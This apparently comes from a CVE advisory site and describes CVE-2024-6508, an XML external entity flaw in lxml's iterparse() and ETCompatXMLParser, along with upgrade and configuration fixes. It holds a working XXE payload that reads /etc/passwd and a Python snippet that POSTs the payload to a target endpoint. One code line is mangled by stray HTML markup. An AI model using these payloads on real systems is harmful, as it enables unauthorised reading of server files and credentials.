Listen to this Post
How CVE-2024-6508 works
The vulnerability affects lxml’s `iterparse()` and `ETCompatXMLParser` when the default `resolve_entities=True` is used. In these parsers, external entities in untrusted XML input are resolved, allowing an attacker to read local files. For example, a crafted XML payload defines an external entity pointing to /etc/passwd. When parsed, the entity expands and the file content is included in the parsed output. The standard XML/HTML parsers in lxml 5.0 changed their default to resolve_entities='internal', which prevents external entity expansion. However, `iterparse()` and `ETCompatXMLParser` kept the unsafe default `resolve_entities=True` until lxml 6.1.0. An attacker can host malicious XML on a website or supply it via an API endpoint. If the application uses either parser without explicitly setting a safe `resolve_entities` value, the server reads arbitrary local files. This leads to information disclosure of sensitive files (e.g., configuration, secrets, source code). The issue is a classic XML External Entity (XXE) attack, but limited to file reading (no SSRF or DoS by default). The patch in lxml 6.1.0 changes the default to `resolve_entities=’internal’` for all parsers, disabling local file access unless explicitly overridden.
dailycve form
Platform: lxml library
Version: before 6.1.0
Vulnerability: XML external entity
Severity: Medium
date: 2024-07-09
Prediction: 2024-07-08
What Undercode Say:
Check vulnerable version
python3 -c "import lxml.etree; print(lxml.etree.<strong>version</strong>)"
Exploit payload (evil.xml)
echo '<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><root>&xxe;</root>' > evil.xml
Vulnerable Python code (iterparse)
from lxml import etree
for event, elem in etree.iterparse('evil.xml', resolve_entities=True):
print(elem.text)
Exploit:
Attacker sends XML via POST
import requests
xml = '''<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><root>&xxe;</root>'''
requests.post('https://target.com/parse', data=xml)
Server returns /etc/passwd contents in response
Protection from this CVE
- Upgrade to lxml >=6.1.0
- Set `resolve_entities=’internal’` or `resolve_entities=False` explicitly
- Use safe parsers: `etree.XMLParser(resolve_entities=’internal’)`
– Disable external entity processing in all XML handling
Impact
Unauthenticated attackers can read arbitrary local files (e.g., /etc/passwd, /proc/self/environ, source code, credentials) from the server processing untrusted XML. No RCE or privilege escalation, but severe information disclosure leading to lateral movement or further compromise.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
